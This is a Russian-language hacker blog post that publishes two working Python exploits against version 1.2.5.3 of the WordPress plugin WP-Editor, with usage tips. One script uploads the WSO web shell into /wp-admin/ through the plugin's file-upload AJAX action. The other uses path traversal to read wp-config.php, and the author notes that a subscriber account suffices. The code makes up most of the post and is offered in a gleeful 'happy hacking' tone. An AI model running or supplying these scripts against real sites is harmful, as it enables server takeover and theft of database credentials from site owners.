- Получить ссылку
- X
- Электронная почта
- Другие приложения
Давно чот не палил приватных приватов. Будем исправлять...
Илитным отрядом красных боевых медведов был
написан набыдлокоден (уже больше года назад)
зироди говно-сплоет.
Похеканный плогин: https://wordpress.org/plugins/wp-editor/Версия: 1.2.5.3Активных инсталлов: 100,000+
Похеканный плогин: https://wordpress.org/plugins/wp-editor/Версия: 1.2.5.3Активных инсталлов: 100,000+
Эксплоент:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
|
#!/usr/bin/python
#coding: utf-8
"""
Exploit Title: Wordpress Plugin, Wp-Editor, Shell Upload
Date: 13/01/2015
Exploit Author: RedBear (krober.biz)
Software Link: https://wordpress.org/plugins/wp-editor/
Version: 1.2.5.3
Tested on: Apache, Wordpress 4.5
Vuln. Code:
file: ./wp-editor/classes/WPEditorBrowser.php
line: 228, function uploadThemeFiles()
line: 290, function uploadPluginFiles()
"""
import requests
import sys
if sys.version_info[0]==2:
_input = raw_input
else:
_input = input
domain = "www.example.com"
username = "hacker"
password = "31337"
file = "wso2.php"
kiddie = True
useragent = "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
#for tests in burp suite
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}
if domain == "":
print("Type domain:")
domain = _input(">>").strip()
if username == "":
print("Type username:")
username = _input(">>").strip()
if kiddie:
exit()
if password == "":
print("Type password:")
password = _input(">>").strip()
if file == "":
print("Type filename to upload:")
password = _input(">>").strip()
url_login = "http://"+domain+"/wp-login.php"
url_admin_ajax = "http://"+domain+"/wp-admin/admin-ajax.php"
########
# STEP 1
########
session = requests.Session()
paramsPost = { "log":username,"testcookie":"1",
"rememberme":"forever",
"pwd":password,
"redirect_to":"http://"+domain+"/wp-admin/"
}
headers = { "Accept":"text/html",
"User-Agent":useragent,
"Referer":"http://"+domain+"/wp-login.php",
"Connection":"keep-alive",
"Content-Type":"application/x-www-form-urlencoded"
}
r1 = session.post(url_login, data=paramsPost, headers=headers, proxies=proxies)
print("Logged in...")
########
# STEP 2
########
# Upload shell method 1
# current_plugin_root
paramsPost = { "current_plugin_root":".",
"action":"upload_files",
"directory":""
}
paramsMultipart = [('file-0', (file, open(file,'rb'), 'application/octet-stream'))]
headers = { "User-Agent":useragent,
"Accept":"application/json"
}
r2 = session.post(url_admin_ajax, data=paramsPost, files=paramsMultipart, headers=headers, cookies=r1.cookies, proxies=proxies)
print("Try to upload shell...")
########
# STEP 3
########
r3 = session.get("http://"+domain+"/wp-admin/"+file, proxies=proxies)
#Проверка не очень, сами допишите, под свой шелл
if r3.status_code == 200:
print("Shell uploaded: "+ "http://"+domain+"/wp-admin/"+file)
else:
print("Exploit failed...")
# Upload shell method 2
# Replace: "current_plugin_root" -> "current_theme_root"
|
Если зведы сойдутся, шелл будет лежать в папочке /wp-admin/. Ну и перед тем как запускать, положите в папочку с запускаемым скриптом wso2.php. К слову, там есть и читалка файлов, если залить шелл не получается:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
|
#!/usr/bin/python
#-*- coding: utf-8 -*-
"""
Exploit Title: Wordpress Plugin, Wp-Editor, File Reader
Date: 13/01/2015
Exploit Author: RedBear (krober.biz)
Software Link: https://wordpress.org/plugins/wp-editor/
Version: 1.2.5.3
Tested on: Apache, Wordpress 4.5
Vuln. Code:
file: ./wp-editor/classes/WPEditorBrowser.php
function getFilesAndFolders()
"""
#Proof of Concept - read wp-config.php
import requests
import sys
if sys.version_info[0]==2:
_input = raw_input
else:
_input = input
domain = "www.example.com"
username = "hacker"
password = "31337"
useragent = "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
if domain == "":
print("Type domain:")
domain = _input(">>").strip()
if username == "":
print("Type username:")
username = _input(">>").strip()
if password == "":
print("Type password:")
password = _input(">>").strip()
url_login = "http://"+domain+"/wp-login.php"
url_admin_ajax = "http://"+domain+"/wp-admin/admin-ajax.php"
session = requests.Session()
########
# STEP 1
########
paramsPost = { "log":username,"testcookie":"1",
"rememberme":"forever",
"pwd":password,
"redirect_to":"http://"+domain+"/wp-admin/"
}
headers = { "Accept":"text/html",
"User-Agent":useragent,
"Referer":"http://"+domain+"/wp-login.php",
"Connection":"keep-alive",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded"
}
r1 = session.post(url_login, data=paramsPost, headers=headers)
print("Logged in...")
########
# STEP 2
########
paramsPost = {"action":"ajax_folders","dir":"./../wp-config.php","type":"theme","contents":"1"}
headers = { "Accept":"application/json, text/javascript, */*; q=0.01",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":useragent,
"Referer":"http://"+domain+"/wp-admin/plugins.php?page=wpeditor_plugin",
"Connection":"keep-alive",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded"
}
r2 = session.post("http://"+domain+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers, cookies=r1.cookies)
jso = r2.json()
print(jso['content'])
|
Ах, да, совсем забыл. Для того, чтобы сплойт успешно отработал, нужен хотя бы самый галимый доступ (например, доступ подписчика). Ну вы понели...
В общем, удачных похеков (и покаков), поцоны)))
- Получить ссылку
- X
- Электронная почта
- Другие приложения
Комментарии
Отправить комментарий